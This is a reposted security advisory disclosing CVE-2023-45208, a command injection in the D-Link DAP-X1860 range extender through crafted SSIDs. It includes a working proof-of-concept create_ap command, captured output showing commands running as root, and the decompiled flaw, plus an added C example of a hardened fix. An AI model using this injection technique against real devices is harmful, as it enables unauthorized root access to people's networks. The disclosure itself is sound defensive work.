D-Link DAP-X1860: Remote Command Injection


The Wi-Fi network scanning functionality of the D-Link DAP-X1860 range extender is susceptible to remote command injection. Attackers who create a Wi-Fi network with a crafted SSID in range of the extender can run shell commands during the setup process or when using the network scan function of the range extender.


Details
=======

Product: D-Link DAP-X1860
Affected Versions: Tested on 1.00, 1.01b94, 1.01b05-01, other versions may be affected, too
Fixed Versions: Not fixed
Vulnerability Type: Command Injection
Security Risk: medium
Vendor URL: https://eu.dlink.com/de/de/products/dap-x1860-ax1800-mesh-wifi-6-range-extender
Vendor Status: notified, not responding
Advisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2023-006
Advisory Status: published
CVE: CVE-2023-45208
CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-45208


Introduction
============

The D-Link DAP-X1860 is a Mesh Wi-Fi 6 Range Extender.


More Details
============

During the setup process of the range extender, nearby Wi-Fi networks are identified using the SOAP action "GetSiteSurvey". If a Wi-Fi network with an apostrophe (such as `Olaf's Network`) in its SSID is in range of the extender, the setup process will crash repeatedly with the following response from the server:

------------------------------------------------------------------------
Error 500: Internal Server Error
CGI program sent malformed HTTP headers: [0   1   *****                **:**:**:**:**:**   WPA2PSK/AES 7        11b/g/n     NONE   In 17       YES      NO
1   1   *****               **:**:**:**:**:** WPA2PSK/AES            24       11b/g/n     NONE   In 13 YES      NO
2   1   *****               **:**:**:**:**:** WPA2PSK/AES            47       11b/g/n/ax  NONE   In 13 YES      NO
3   1   *****               **:**:**:**:**:** WPAPSKWPA2PSK/TKIPAES  81       11b/g/n     NONE   In 7 YES      NO
4   1   *****               **:**:**:**:**:** WPA2PSKWPA3PSK/AES     63       11b/g/n/ax  NONE   In 19 YES      NO
5   1   *****               **:**:**:**:**:** WPA2PSK/AES            44       11b/g/n/ax  NONE   In 5 NO      NO
6   1   Olafs Network **:**:**:**:**:** WPA2PSK/AES 47 11b/g/n/ax NONE In 20 NO NO
sh: 7: not found
sh
------------------------------------------------------------------------ 

The output `sh: 7: not found` indicates that the extender attempted to execute some command. The apostrophe originally present in the SSID `Olaf's Network` is missing from the output, and that line has lost the column alignment of the other lines: both observations are consistent with the single quote being consumed by a shell, which then treats the following scan line, beginning with `7`, as a command of its own.

This alone can be exploited as a denial-of-service vulnerability, since the setup process cannot be completed. However, it was also possible to execute arbitrary commands on the extender. For instance, the command `uname -a`, which prints general kernel information, was injected by creating a Wi-Fi network within range whose SSID contains a single quote followed by the command, chained with the shell's logical AND operator `&&`. The trailing `&&` separates the injected command from the rest of the scan line, which the shell then tries to run on its own (visible as the `sh: ...: not found` errors below). The network was started using create_ap [1]:

------------------------------------------------------------------------
$ create_ap -n wlan0 "Test' && uname -a &&" randompw98zwrd8g283d3
------------------------------------------------------------------------ 

After rescanning for Wi-Fi networks on the range extender, the web interface responds with an HTTP 500 error whose body includes the output of the injected command:

------------------------------------------------------------------------
Error 500: Internal Server Error
CGI program sent malformed HTTP headers: [0   1   *****                **:**:**:**:**:**   WPA2PSK/AES 0        11b/g/n     NONE   In 17       YES      NO
1   1   Test
Linux dlink-rp 4.4.198 #3 SMP Mon Jan 11 10:38:51 CST 2021 mips GNU/Linux
sh: **:**:**:**:**:**: not found
sh: 2: not found
sh: 3: not found
sh: 4: not found
[...]
sh: 40: not
------------------------------------------------------------------------ 

As can be seen, the command was executed and its output was printed in the response. Further analysis of the device revealed that all processes on the device including the injected commands run as the high-privileged root user. 

The vulnerability originates from the `parsing_xml_stasurvey` function in libcgifunc.so, where a system command is executed containing the SSIDs from the Wi-Fi scan results without proper escaping:

------------------------------------------------------------------------
[...]
snprintf(acStack_1a0,100,"echo %s > /tmp/Channel_check",&scanned_ap_info);
system(acStack_1a0);
[...]
------------------------------------------------------------------------ 
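To make the defect concrete, the following C example, added for this page and not taken from the firmware or from the advisory authors, reproduces the command construction from the decompiled snippet without ever calling system(), places a hardened replacement beside it that writes the scan result to the file through stdio so that no shell parses an SSID, and adds a screen for shell metacharacters for code paths where a shell truly cannot be avoided. The function names, the demo file path and the sample scan line (built in the advisory's table format, with the MAC redacted as there) are assumptions made for the example.

```c
#include <stdio.h>
#include <string.h>

/* Vulnerable pattern, modelled on the decompiled parsing_xml_stasurvey:
 * the scan result, which carries attacker-chosen SSIDs, is formatted into
 * a shell command line. Only the string construction is reproduced here;
 * the firmware hands the result to system(), which this demo never calls. */
int build_vulnerable_command(const char *scanned_ap_info, char *out, size_t out_len)
{
    return snprintf(out, out_len, "echo %s > /tmp/Channel_check", scanned_ap_info);
}

/* Hardened replacement: write the scan result to the file with stdio.
 * No shell is involved, so no byte of an SSID is ever interpreted and no
 * escaping is needed. Returns 0 on success, -1 on any I/O failure. */
int write_channel_check(const char *path, const char *scanned_ap_info)
{
    FILE *f = fopen(path, "w");
    if (f == NULL)
        return -1;
    size_t len = strlen(scanned_ap_info);
    int ok = fwrite(scanned_ap_info, 1, len, f) == len && fputc('\n', f) != EOF;
    if (fclose(f) != 0)
        ok = 0;
    return ok ? 0 : -1;
}

/* Defensive screen for code paths where a shell truly cannot be avoided:
 * reject the value if it contains any byte the shell may interpret.
 * An SSID is up to 32 arbitrary bytes, so rejecting is safer than trying
 * to escape; the list is deliberately broad. Returns 1 if the string must
 * be rejected, 0 if it is plain. */
int contains_shell_meta(const char *s)
{
    static const char meta[] = "'\"`$&|;<>()\\\n\r*?[]{}~#!";
    for (; *s != '\0'; s++)
        if (strchr(meta, *s) != NULL)
            return 1;
    return 0;
}

/* Reads a file back into buf (NUL-terminated) so the hardened writer can
 * be verified. Returns the number of bytes read, or -1 on error. */
long read_back(const char *path, char *buf, size_t buf_len)
{
    FILE *f = fopen(path, "r");
    if (f == NULL)
        return -1;
    size_t n = fread(buf, 1, buf_len - 1, f);
    fclose(f);
    buf[n] = '\0';
    return (long)n;
}

int main(void)
{
    /* Constructed scan line in the advisory's table format (MAC redacted as
     * there); the SSID field is the proof-of-concept SSID from the advisory. */
    const char *poc_line =
        "1   1   Test' && uname -a && **:**:**:**:**:** WPA2PSK/AES 0 11b/g/n NONE In 13 YES NO";
    char cmd[256];

    build_vulnerable_command(poc_line, cmd, sizeof cmd);
    printf("what system() would receive: %s\n", cmd);

    printf("screen rejects \"Olaf's Network\": %d\n", contains_shell_meta("Olaf's Network"));
    printf("screen rejects \"HomeWiFi-5G\":    %d\n", contains_shell_meta("HomeWiFi-5G"));

    /* Hypothetical demo path; the firmware itself uses /tmp/Channel_check. */
    const char *path = "/tmp/Channel_check_demo";
    char back[256];
    if (write_channel_check(path, poc_line) == 0 && read_back(path, back, sizeof back) > 0)
        printf("written without a shell, bytes intact: %s", back);
    remove(path);
    return 0;
}
```

With the proof-of-concept SSID, the vulnerable builder yields a command line in which `&& uname -a &&` sits outside any control of the firmware; with the 100-byte buffer shown in the decompile, the trailing redirect is even truncated away, so the scan output lands in the response instead of the file. The stdio writer stores the same bytes, apostrophe included, without a shell ever seeing them.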


Proof of Concept
================

Create a Wi-Fi network with an SSID containing a single quote, followed by a shell command separator such as `&&` and the command to be run. In the following, create_ap [1] was used to create the Wi-Fi network:

------------------------------------------------------------------------
$ create_ap -n wlan0 "Test' && uname -a &&" random98zwrd8g283d3
------------------------------------------------------------------------ 

To trigger the exploit, run the setup process of the range extender, or if it is already configured, run a network scan. The output of the command can be seen in HTTP responses of the extender's web interface.

Security Risk
=============

Attackers within Wi-Fi range of the extender may leverage this vulnerability to obtain access to the extender's local network. While the injected commands are only executed during device setup or during a manual Wi-Fi scan, attackers could try to de-authenticate the extender so that the owner triggers a Wi-Fi scan to make the extender work again. As a result, this vulnerability is rated to pose a medium risk.


Timeline
========

2023-05-06 Vulnerability identified
2023-05-08 Reported to [email protected]
2023-06-19 After receiving no reply, a reminder was sent to [email protected]
2023-07-21 After again receiving no reply, a D-Link security contact known from a previous disclosure was notified directly
2023-08-07 After again receiving no reply, another reminder sent to [email protected]
2023-10-05 CVE ID requested
2023-10-05 CVE ID assigned
2023-10-09 Advisory released


References
==========

[1]: https://github.com/oblique/create_ap


RedTeam Pentesting GmbH
=======================

RedTeam Pentesting offers individual penetration tests performed by a team of specialised IT-security experts. Hereby, security weaknesses in company networks or products are uncovered and can be fixed immediately. 

As there are only few experts in this field, RedTeam Pentesting wants to share its knowledge and enhance the public knowledge with research in security-related areas. The results are made available as public security advisories.

More information about RedTeam Pentesting can be found at:
https://www.redteam-pentesting.de/


Working at RedTeam Pentesting
=============================

RedTeam Pentesting is looking for penetration testers to join our team in Aachen, Germany. If you are interested please visit:
https://jobs.redteam-pentesting.de/

Originally published by redteam-pentesting: D-Link DAP-X1860: Remote Command Injection

Copyright notice: posted by admin on 2023-10-13 at 08:42.
Reprints must credit: D-Link DAP-X1860: Remote Command Injection | CTF导航
